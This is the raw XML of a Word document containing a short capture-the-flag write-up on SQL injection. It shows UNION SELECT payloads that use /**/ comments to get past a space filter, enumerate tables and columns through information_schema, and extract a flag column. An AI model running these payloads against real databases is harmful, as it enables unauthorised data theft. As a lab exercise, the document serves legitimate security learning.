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F5C7E" w14:textId="73D06AAC" w:rsidR="00844000" w:rsidRDefault="00E106F1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4EC3F71" wp14:editId="464A9AA8">
            <wp:extent cx="5943600" cy="166116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7B09" w14:textId="031522A8" w:rsidR="00E106F1" w:rsidRDefault="00E106F1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CDF3F9A" w14:textId="46A41A76" w:rsidR="00E106F1" w:rsidRDefault="00E106F1">
      <w:r>
        <w:t xml:space="preserve">Use the command “  union select 1,2,3# “ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209800B4" w14:textId="2CF9C9FA" w:rsidR="00E106F1" w:rsidRDefault="00E106F1">
      <w:r>
        <w:t>The site will return as shows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C65656" w14:textId="614DE4A7" w:rsidR="00E106F1" w:rsidRDefault="00E106F1">
      <w:r>
        <w:t>Because the site removes our ‘space” input, we need to by pass the removal  by using /**/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0449C4FF" w14:textId="301A9B33" w:rsidR="00E106F1" w:rsidRDefault="00E106F1">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Try “ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/**/union/**/select/**/1,2#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2896FC0D" w14:textId="585212D9" w:rsidR="00E106F1" w:rsidRDefault="00E106F1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B3CAD06" wp14:editId="764F3931">
            <wp:extent cx="4488569" cy="1013548"/>
            <wp:effectExtent l="0" t="0" r="762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E705" w14:textId="6B3DF6E5" w:rsidR="00E106F1" w:rsidRDefault="00E106F1">
      <w:r>
        <w:t>Because it returns ‘2’, we do inject to the 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00E106F1">
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>nd</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC87FDE" w14:textId="66CF646F" w:rsidR="00E106F1" w:rsidRDefault="00E106F1">
      <w:r>
        <w:t>/**</w:t>
      </w:r>
      <w:r w:rsidRPr="00E106F1">
        <w:t>/union/**/select/**/1,table_name/**/from/**/information_schema.tables#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF56318" w14:textId="77777777" w:rsidR="00E106F1" w:rsidRDefault="00E106F1">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40FFD1AA" w14:textId="49E77A91" w:rsidR="00E106F1" w:rsidRDefault="00E106F1">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C1122C0" wp14:editId="29567E7B">
            <wp:extent cx="5479255" cy="998307"/>
            <wp:effectExtent l="0" t="0" r="762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7015" w14:textId="43E0962A" w:rsidR="00E106F1" w:rsidRDefault="00E106F1" w:rsidP="00E106F1">
      <w:pPr>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:r>
        <w:t>The table “alkdjf4iu” looks suspicious, lets look into it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EDA546" w14:textId="3D4CD928" w:rsidR="00E106F1" w:rsidRDefault="00E106F1" w:rsidP="00E106F1">
      <w:pPr>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:r>
        <w:t>/**</w:t>
      </w:r>
      <w:r w:rsidRPr="00E106F1">
        <w:t>/union/**/select/**/1,column_name/**/from/**/information_schema.columns#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48339D69" w14:textId="476EC308" w:rsidR="00E106F1" w:rsidRDefault="00E106F1" w:rsidP="00E106F1">
      <w:pPr>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:r>
        <w:t>We will see a column named ‘flag”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3CE371" w14:textId="70FDC456" w:rsidR="00E106F1" w:rsidRDefault="00E106F1" w:rsidP="00E106F1">
      <w:pPr>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="018C6544" wp14:editId="38FA2F85">
            <wp:extent cx="2187130" cy="983065"/>
            <wp:effectExtent l="0" t="0" r="3810" b="762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169F" w14:textId="7A749CFC" w:rsidR="00E106F1" w:rsidRDefault="00E106F1" w:rsidP="00E106F1">
      <w:pPr>
        <w:ind w:left="720" w:hanging="720"/>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">When we use “ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>/**/union/**/select/**/flag/**/from/**/alkdjf4iu#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> “ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>to see content of the column directly it will show nothing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B77B83" w14:textId="5D1160A8" w:rsidR="00E106F1" w:rsidRDefault="00E106F1" w:rsidP="00E106F1">
      <w:pPr>
        <w:ind w:left="720" w:hanging="720"/>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Try changing f</w:t>
      </w:r>
      <w:r w:rsidR="00EE2009">
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>lag</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> to *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39722CA8" w14:textId="3C591596" w:rsidR="00E106F1" w:rsidRPr="00E106F1" w:rsidRDefault="00006ED7" w:rsidP="00E106F1">
      <w:pPr>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="444444"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>We got the flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677F9181" w14:textId="77777777" w:rsidR="00E106F1" w:rsidRPr="00E106F1" w:rsidRDefault="00E106F1"/>
    <w:sectPr w:rsidR="00E106F1" w:rsidRPr="00E10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F1"/>
    <w:rsid w:val="00006ED7"/>
    <w:rsid w:val="00844000"/>
    <w:rsid w:val="00E106F1"/>
    <w:rsid w:val="00EE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E0F8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CF8809A6-2D1A-4545-AD08-8823BB38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106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benaiah</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>ezekiel benaiah</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-01-20T11:49:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-01-20T12:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>